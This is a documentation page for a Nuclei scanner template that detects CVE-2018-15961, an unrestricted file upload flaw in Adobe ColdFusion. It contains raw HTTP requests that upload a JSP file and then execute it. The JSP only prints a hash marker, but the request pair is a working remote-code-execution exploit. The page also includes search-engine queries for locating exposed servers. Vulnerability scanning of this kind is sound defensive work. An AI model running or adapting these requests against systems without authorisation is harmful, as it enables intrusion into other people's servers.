Adobe ColdFusion - Unrestricted File Upload Remote Code Execution
ID: CVE-2018-15961
Severity: critical
Author: SkyLark-Lab,ImNightmaree
Tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
Description
Section titled “Description”Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
YAML Source
Section titled “YAML Source”id: CVE-2018-15961
info: name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution author: SkyLark-Lab,ImNightmaree severity: critical description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. impact: | Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to take control of the affected system. remediation: | Apply the necessary security patches or updates provided by Adobe to fix this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621 - http://www.securitytracker.com/id/1041621 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 epss-score: 0.97436 epss-percentile: 0.99942 cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 vendor: adobe product: coldfusion shodan-query: - http.component:"Adobe ColdFusion" - http.component:"adobe coldfusion" - http.title:"coldfusion administrator login" - cpe:"cpe:2.3:a:adobe:coldfusion" fofa-query: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
http: - raw: - | POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------24464570528145
-----------------------------24464570528145 Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg
<%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> <% String cve = "CVE-2018-15961"; MessageDigest alg = MessageDigest.getInstance("MD5"); alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); String hx; for (int i=0;i<digest.length;i++){ hx = Integer.toHexString(0xFF & digest[i]); if(hx.length() == 1){hx = "0" + hx;} hashedpasswd.append(hx); } out.println(hashedpasswd.toString()); %> -----------------------------24464570528145 Content-Disposition: form-data; name="path"
{{randstr}}.jsp -----------------------------24464570528145-- - | GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word words: - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961
- type: status status: - 200# digest: 4a0a00473045022100cabe5fb46e7280a11952fe1d1ecbb077b8b1a17ab2dc5b017c581af8c059a1c602203097a5fbbe0cb8e750cf9dfb5853f04edd633a57bbc557aae52655a6d0bb4af9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-15961.yaml"